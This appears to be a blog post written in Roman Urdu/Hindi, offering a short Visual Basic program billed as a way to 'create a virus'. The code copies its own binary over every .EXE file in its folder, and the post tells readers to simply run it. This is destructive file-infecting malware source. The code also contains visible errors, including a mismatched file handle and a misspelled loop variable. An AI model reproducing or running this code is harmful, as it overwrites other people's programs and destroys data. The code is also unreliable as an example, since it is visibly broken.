Home » , » How to Create Virus (Learning Purpose)

How to Create Virus (Learning Purpose)

Visual Basic Main Virus Banane ke Lie Chota sa code Sirf Un ke lye Jo visual basic ko thora bohat jante hain....

Sab se Pehle ye Code Jeneral Main likhain...

" Dim binarycode() As Byte
Dim victim As String
Const mysize As Integer = 11776 "

Phir Form ke load event main ye code likhain:

Private Sub Form_Load()
On Error Resume Next
Dim Free
Free = FreeFile

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
ReDim binarycode(mysize)
Get #1, 1, binarycode
Close #Free

victim = Dir(App.Path & "\" & "*.EXE")
While victim <> ""

Open App.Path & "\" & victim For Binary Access Write As #Free
Put #1, , binarycode
Put #1, , mysize
Close #Free

victum = Dir()

wend

End
End Sub


Sirf Programm ko Run karwain.
Share this article :

Live A-Z Mp3 Songs, Online Movies,

Bollywood Movies A-Z List

A|B|C|D|E|F|G|H|I|J|K|L|M|N|O|A P|Q|R|S|T|V|W|X|Y|Z

Hollywood Movies A-Z List

A|B|C|D|E|F|G|H|I|J|k|L|M|N|O|P|Q|R|S|T|U|V|W|X|Y|Z

Mp3 Songs A-Z List

A|B|C|D|E|F|G|H|I|J|K|L|M|N|O|P|Q|R|S|T|U|V|W|X|Y|Z

Live Chat


ShoutMix chat widget

More Discussion Visit Forum

All Pakistan Papers Official Websites

Make Money Online

Site Stats

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2013. multimedia - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger